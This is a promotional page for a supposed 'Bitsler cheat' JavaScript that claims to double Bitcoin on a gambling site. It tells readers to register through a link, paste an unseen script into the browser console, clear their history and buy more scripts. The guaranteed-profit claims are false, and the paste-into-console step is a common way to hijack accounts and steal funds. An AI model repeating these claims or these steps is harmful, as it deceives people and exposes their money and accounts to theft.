Multiply BitCoins Double BTC in Minutes Bitsler Cheat Javascript 110% Genuine and Working Script

Link to Get this Bitsler Cheat Javascript:
Why this is Cheat Script: You are confusing Bitsler by Putting Low amount then your Balance.

script type="text/javascript" src="">

This Video is for Bitsler Cheat JavaScript- This is one of the safest and best way to Earn BitCoins BTC on Bitsler.
Payout: 1.2
Amount: 100 (You can place more BUT 100 is on safer side)
Automated Betting- Losing Event-Increase Decrease 600%

1. Clean all your cache and bitsler traces and histroy from your computer
2. Open a Fresh Bitsler Account using this Link
3. After the above Settings just paste the script in the Console and Run. You will get a Popup after some time
4. Popup will ask you for the Amount you want to Play- Dont Put more then 30% of your Bitsler balance in the Popup
5. Similiarly you will get another popup and then other and then other. Refresh the page when 4th popup appear
6. Start Again
7. Dont Use the script for more then 15 Minutes continuously. Have a Gap of at least 30 Minutes before using it again
8. Before you use the script again, please delete the bitsler history and make sure you refresh the Page couple of Times.
9. This is a Fast and Powerful script. Dont be in a rush to earn huge money on the same day. If your Bitsler balance is 0.1 BTC, Dont put more then 0.02 or 0.03 in the Amount
This is because sometimes you will get popup continuously so if you have bet for less then your balance you will be able to manage well.

Link to Get this Bitsler Cheat Javascript:

I have a BlockBuster offer for you if you want to have multiple scripts.
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What will you Get in the Above Video Success Pack:

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